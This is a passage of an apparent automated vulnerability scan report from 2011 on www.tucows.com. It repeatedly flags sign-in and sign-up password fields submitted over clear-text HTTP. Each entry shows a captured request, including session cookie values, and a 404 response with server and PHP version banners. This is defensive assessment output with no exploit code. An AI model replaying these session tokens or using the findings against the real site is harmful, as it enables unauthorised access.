Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.25. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.26. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.27. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.28. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.29. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.30. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.31. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.32. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.33. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.34. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.35. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.36. http://www.tucows.com/images/newassets/javascript:void(null)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
